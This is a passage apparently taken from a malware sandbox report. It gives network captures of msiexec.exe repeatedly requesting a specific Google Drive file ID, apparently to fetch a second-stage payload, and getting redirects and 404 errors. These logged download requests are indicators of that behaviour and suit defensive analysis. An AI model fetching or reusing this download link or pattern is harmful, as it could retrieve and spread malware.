Dec 3, 2024 16:42:22.214164972 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:22.214194059 CET	443	49908	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:22.214253902 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:22.214319944 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:22.214361906 CET	443	49908	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:22.214416027 CET	49908	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:22.225106001 CET	49914	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:22.225152969 CET	443	49914	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:22.225246906 CET	49914	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:22.225491047 CET	49914	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:22.225506067 CET	443	49914	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:23.973012924 CET	443	49914	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:23.973237038 CET	49914	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:23.973839045 CET	49914	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:23.973846912 CET	443	49914	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:23.973999977 CET	49914	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:23.974005938 CET	443	49914	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:24.964241982 CET	443	49914	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:24.964346886 CET	49914	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:24.964621067 CET	443	49914	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:24.964679956 CET	49914	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:24.965007067 CET	49914	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:24.965049982 CET	443	49914	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:24.965097904 CET	49914	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:25.089994907 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:25.090025902 CET	443	49923	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:25.090106964 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:25.090347052 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:25.090362072 CET	443	49923	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:26.837862015 CET	443	49923	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:26.837935925 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:26.838644028 CET	443	49923	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:26.838689089 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:26.840437889 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:26.840450048 CET	443	49923	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:26.840703011 CET	443	49923	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:26.840745926 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:26.841135979 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:26.883336067 CET	443	49923	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:27.761795044 CET	443	49923	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:27.761852980 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:27.761877060 CET	443	49923	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:27.761971951 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:27.762013912 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:27.762053013 CET	443	49923	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:27.762160063 CET	49923	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:27.773058891 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:27.773099899 CET	443	49930	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:27.773233891 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:27.773472071 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:27.773485899 CET	443	49930	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:29.562369108 CET	443	49930	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:29.562464952 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:29.564086914 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:29.564095974 CET	443	49930	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:29.564340115 CET	443	49930	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:29.564419985 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:29.564703941 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:29.607331038 CET	443	49930	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:30.595010996 CET	443	49930	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:30.595079899 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:30.595716953 CET	443	49930	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:30.595813990 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:30.595851898 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:30.595912933 CET	443	49930	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:30.595983028 CET	443	49930	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:30.595989943 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:30.596028090 CET	49930	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:30.714859962 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:30.714895964 CET	443	49937	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:30.715001106 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:30.715272903 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:30.715285063 CET	443	49937	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:32.505728006 CET	443	49937	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:32.505841017 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:32.506509066 CET	443	49937	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:32.506618977 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:32.508311033 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:32.508323908 CET	443	49937	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:32.508567095 CET	443	49937	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:32.508625031 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:32.509305000 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:32.555330038 CET	443	49937	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:33.454410076 CET	443	49937	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:33.454489946 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:33.454648972 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:33.454696894 CET	443	49937	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:33.454747915 CET	49937	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:33.470314980 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:33.470360994 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:33.470434904 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:33.470664978 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:33.470674992 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:35.258517027 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:35.258599043 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:35.259006977 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:35.259012938 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:35.259192944 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:35.259197950 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:36.236358881 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:36.236423969 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:36.236437082 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:36.236479044 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:36.237232924 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:36.237278938 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:36.237287998 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:36.237308979 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:36.237329006 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:36.237359047 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:36.274185896 CET	49945	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:36.274199009 CET	443	49945	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:36.438224077 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:36.438277960 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:36.438373089 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:36.438606024 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:36.438621044 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:38.223736048 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:38.223906994 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:38.224543095 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:38.224611998 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:38.226509094 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:38.226515055 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:38.226775885 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:38.226840019 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:38.227241993 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:38.271327972 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:39.151551008 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:39.151851892 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:39.151870966 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:39.151917934 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:39.152789116 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:39.152836084 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:39.152971029 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:39.247704029 CET	49952	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:39.247734070 CET	443	49952	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:39.284292936 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:39.284332991 CET	443	49960	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:39.284574032 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:39.284809113 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:39.284837961 CET	443	49960	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:41.039474010 CET	443	49960	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:41.039649010 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:41.040152073 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:41.040157080 CET	443	49960	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:41.040319920 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:41.040323973 CET	443	49960	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:42.005429029 CET	443	49960	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:42.005496979 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:42.006074905 CET	443	49960	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:42.006119967 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:42.006150961 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:42.006232977 CET	443	49960	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:42.006278038 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:42.006297112 CET	443	49960	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:42.006364107 CET	49960	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:42.137152910 CET	49966	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:42.137192965 CET	443	49966	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:42.137314081 CET	49966	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:42.137885094 CET	49966	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:42.137898922 CET	443	49966	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:43.882951021 CET	443	49966	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:43.883050919 CET	49966	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:43.917790890 CET	49966	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:43.917804003 CET	443	49966	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:43.917989969 CET	49966	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:43.917995930 CET	443	49966	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:44.794728041 CET	443	49966	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:44.794922113 CET	49966	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:44.794936895 CET	443	49966	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:44.795099020 CET	49966	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:44.795169115 CET	49966	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:44.795212030 CET	443	49966	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:44.795269966 CET	49966	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:44.805253029 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:44.805313110 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:44.805382967 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:44.805634975 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:44.805650949 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:46.592784882 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:46.592879057 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:46.711179972 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:46.711205006 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:46.711612940 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:46.711677074 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:46.711997986 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:46.759336948 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:47.645054102 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:47.645226002 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:47.645524979 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:47.645610094 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:47.645697117 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:47.645742893 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:47.645806074 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:47.646049023 CET	49973	443	192.168.2.10	142.250.181.1
Dec 3, 2024 16:42:47.646064997 CET	443	49973	142.250.181.1	192.168.2.10
Dec 3, 2024 16:42:47.779171944 CET	49977	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:47.779217958 CET	443	49977	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:47.779331923 CET	49977	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:47.779577017 CET	49977	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:47.779596090 CET	443	49977	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:49.518132925 CET	443	49977	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:49.518199921 CET	49977	443	192.168.2.10	172.217.19.174
Dec 3, 2024 16:42:49.518918037 CET	443	49977	172.217.19.174	192.168.2.10
Dec 3, 2024 16:42:49.519015074 CET	49977	443	192.168.2.10	172.217.19.174

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 16:42:13.599230051 CET	55590	53	192.168.2.10	1.1.1.1
Dec 3, 2024 16:42:13.737643957 CET	53	55590	1.1.1.1	192.168.2.10
Dec 3, 2024 16:42:16.503334999 CET	60134	53	192.168.2.10	1.1.1.1
Dec 3, 2024 16:42:16.645306110 CET	53	60134	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 3, 2024 16:42:13.599230051 CET	192.168.2.10	1.1.1.1	0xbb89	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 3, 2024 16:42:16.503334999 CET	192.168.2.10	1.1.1.1	0x4ce5	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 3, 2024 16:40:40.116894960 CET	1.1.1.1	192.168.2.10	0x6151	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 3, 2024 16:40:40.116894960 CET	1.1.1.1	192.168.2.10	0x6151	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 3, 2024 16:42:13.737643957 CET	1.1.1.1	192.168.2.10	0xbb89	No error (0)	drive.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 3, 2024 16:42:16.645306110 CET	1.1.1.1	192.168.2.10	0x4ce5	No error (0)	drive.usercontent.google.com		142.250.181.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49893	172.217.19.174	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:15 UTC	216	OUT	GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2024-12-03 15:42:16 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:16 GMT Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-vbw9h7Qfz-QAqqZiTAsDUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49902	142.250.181.1	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:18 UTC	258	OUT	GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-03 15:42:19 UTC	2229	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:18 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-TFpLPA0WypS0dwviuLEwkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC7oyf3B5RRcR_my8haiXXmYfXG8_TpZwm3qMJpfW6YDlEmL3rvvM0n5ovD3NXSRxA5DD8ZyPEaZhA Server: UploadServer Set-Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa; expires=Wed, 04-Jun-2025 15:42:18 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:42:19 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 74 5a 63 4f 52 73 47 50 57 57 4a 65 58 63 62 4b 65 45 47 72 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="atZcORsGPWWJeXcbKeEGrg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49908	172.217.19.174	443	7252	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:42:21 UTC	418	OUT	GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
2024-12-03 15:42:22 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:42:21 GMT Location: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Q270tHEVf-g3aA-QIZnljQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49914	142.250.181.1	443	7252	C:\Windows\SysWOW64\msiexec.exe

